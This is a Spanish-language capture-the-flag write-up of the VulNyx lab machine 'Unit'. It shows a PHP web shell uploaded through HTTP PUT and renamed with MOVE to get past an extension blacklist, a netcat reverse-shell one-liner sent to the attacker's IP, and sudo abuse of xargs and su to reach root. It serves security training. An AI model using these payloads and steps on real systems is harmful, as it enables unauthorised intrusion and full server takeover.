🟢 NYX - Unit
#vulnyx #nyx #linux #http methods #put #move #xargs (sudo) #su (sudo)
Diciembre, 8, 2023 by Miguel R. (d4t4s3c)
Information
Unit es una máquina Linux de la plataforma VulNyx, tiene un nivel de dificultad fácil y fue creada por el usuario d4t4s3c.
- Acceso inicial: Mediante malas configuraciones en el backend del servidor web, cargo un archivo con código PHP abusando de métodos HTTP (PUT/MOVE) y obtengo una shell.
- Escalada de privilegios: El usuario dispone de permisos sudo sobre un binario que permitirá convertirse en root.
Enumeration
Nmap
TCP
❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.74
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-02 10:39 CET
Nmap scan report for 192.168.1.74
Host is up (0.0015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8080/tcp open http-proxy
❯ nmap -sVC -p22,80,8080 192.168.1.74
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-02 10:40 CET
Nmap scan report for 192.168.1.74
Host is up (0.00088s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey:
| 256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_ 256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
80/tcp open http nginx 1.22.1
|_http-server-header: nginx/1.22.1
|_http-title: 415 Unsupported Media Type
8080/tcp open http nginx 1.22.1
|_http-server-header: nginx/1.22.1
|_http-title: 415 Unsupported Media Type
| http-methods:
|_ Potentially risky methods: PUT MOVE
Shell (www-data)
80/TCP (HTTP)
Directory Brute Force
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.74/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.74/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 220546 / 220547 (100.00%)
===============================================================
Finished
===============================================================
8080/TCP (HTTP)
Directory Brute Force
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.74:8080/ -b 415
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.74:8080/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 415
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 220546 / 220547 (100.00%)
===============================================================
Finished
===============================================================
En el nmap inicial mediante el script NSE http-methods, se puede observar que se encuentran habilitados algunos métodos HTTP considerados como críticos, el método PUT permite subir archivos y el método MOVE permite renombrar archivos pudiendo derivar en un bypass de extensiones definidas en el backend con una blacklist.
| http-methods:
|_ Potentially risky methods: PUT MOVE
Verifico nuevamente también con cURL
❯ curl -vX OPTIONS "http://192.168.1.74:8080"
* Trying 192.168.1.74:8080...
* Connected to 192.168.1.74 (192.168.1.74) port 8080
* using HTTP/1.x
> OPTIONS / HTTP/1.1
> Host: 192.168.1.74:8080
> User-Agent: curl/8.12.1
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 200 OK
< Server: nginx/1.22.1
< Date: Sun, 02 Mar 2025 10:29:40 GMT
< Content-Type: application/octet-stream
< Content-Length: 0
< Connection: keep-alive
< Allow: OPTIONS, PUT, MOVE
PUT
Intento subir con PUT un archivo php sin éxito, devuelve un código de estado 404 Not Found
❯ cat cmd.php ;echo
<?php system($_GET['cmd']); ?>
❯ curl -vX PUT "http://192.168.1.74:8080/cmd.php" -d @cmd.php
* Trying 192.168.1.74:8080...
* Connected to 192.168.1.74 (192.168.1.74) port 8080
* using HTTP/1.x
> PUT /cmd.php HTTP/1.1
> Host: 192.168.1.74:8080
> User-Agent: curl/8.12.1
> Accept: */*
> Content-Length: 30
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 30 bytes
< HTTP/1.1 404 Not Found
< Server: nginx/1.22.1
< Date: Sun, 02 Mar 2025 10:35:50 GMT
< Content-Type: text/html
< Content-Length: 153
< Connection: keep-alive
<
<html>
<head><title>404 Not Found</title></head>
<body>
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.22.1</center>
</body>
</html>
Extensions Brute Force
Creo un script en bash y dentro de un array agrego posibles extensiones, luego enviaré la petición con cada una de las extensiones y me quedaré con el código de respuesta para saber que extensiones admite el backend.
#!/bin/bash
array=(".php" ".php5" ".phtml" ".jpg" ".jpeg" ".gif" ".rar" ".zip" ".html" ".txt")
echo
for ext in "${array[@]}"; do
code=$(curl -o /dev/null -w "%{http_code}" -sX PUT "http://192.168.1.74:8080/cmd$ext" -d @cmd.php)
echo "[*] Code: $code Extension: $ext"
done
Consigo subir un archivo con extensión .txt con contenido PHP
❯ ./extensions_bruteforce.sh
[*] Code: 404 Extension: .php
[*] Code: 415 Extension: .php5
[*] Code: 415 Extension: .phtml
[*] Code: 415 Extension: .jpg
[*] Code: 415 Extension: .jpeg
[*] Code: 415 Extension: .gif
[*] Code: 415 Extension: .rar
[*] Code: 415 Extension: .zip
[*] Code: 415 Extension: .html
[*] Code: 204 Extension: .txt
MOVE
Ahora con el método MOVE renombró el archivo cambiando la extensión de .txt a .php
❯ curl -vX MOVE -H "Destination: http://192.168.1.74:8080/cmd.php" "http://192.168.1.74:8080/cmd.txt"
* Trying 192.168.1.74:8080...
* Connected to 192.168.1.74 (192.168.1.74) port 8080
* using HTTP/1.x
> MOVE /cmd.txt HTTP/1.1
> Host: 192.168.1.74:8080
> User-Agent: curl/8.12.1
> Accept: */*
> Destination: http://192.168.1.74:8080/cmd.php
>
* Request completely sent off
< HTTP/1.1 204 No Content
< Server: nginx/1.22.1
< Date: Sun, 02 Mar 2025 10:49:11 GMT
< Connection: keep-alive
Reverse Shell
Consigo ejecutar comandos como usuario www-data
❯ curl -sX GET "http://192.168.1.74:8080/cmd.php?cmd=id"
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Ya ejecutando comandos intento obtener una reverse shell
❯ curl -sX GET "http://192.168.1.74:8080/cmd.php?cmd=busybox+nc+192.168.1.10+443+-e+/bin/sh"
Obtengo la shell como usuario www-data
❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.10] from (UNKNOWN) [192.168.1.74] 53734
id ; hostname
uid=33(www-data) gid=33(www-data) groups=33(www-data)
unit
Shell (jones)
El usuario www-data puede ejecutar como jones el binario xargs con sudo
www-data@unit:/$ sudo -l
Matching Defaults entries for www-data on unit:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User www-data may run the following commands on unit:
(jones) NOPASSWD: /usr/bin/xargs
En GTFOBins nos dan el one liner con la secuencia de shell escape y me convierto en usuario jones
www-data@unit:/$ sudo -u jones /usr/bin/xargs -a /dev/null sh
$ bash -i
jones@unit:/$ id ; hostname
uid=1000(jones) gid=1000(jones) groups=1000(jones)
unit
Privilege Escalation
El usuario jones puede ejecutar como root el binario su con sudo
jones@unit:/$ sudo -l
Matching Defaults entries for jones on unit:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User jones may run the following commands on unit:
(root) NOPASSWD: /usr/bin/su
Me convierto en usuario root abusando del privilegio
jones@unit:/$ sudo su
root@unit:/# id ; hostname
uid=0(root) gid=0(root) grupos=0(root)
unit
Flags
Ya como usuario root puedo leer las flags user.txt y root.txt
root@unit:/# find / -name user.txt -o -name root.txt 2>/dev/null |xargs cat
0d65e8**************************
956f45**************************
Hasta aquí la resolución de la máquina Unit.
Happy Hacking!
© d4t4s3c 2023-2025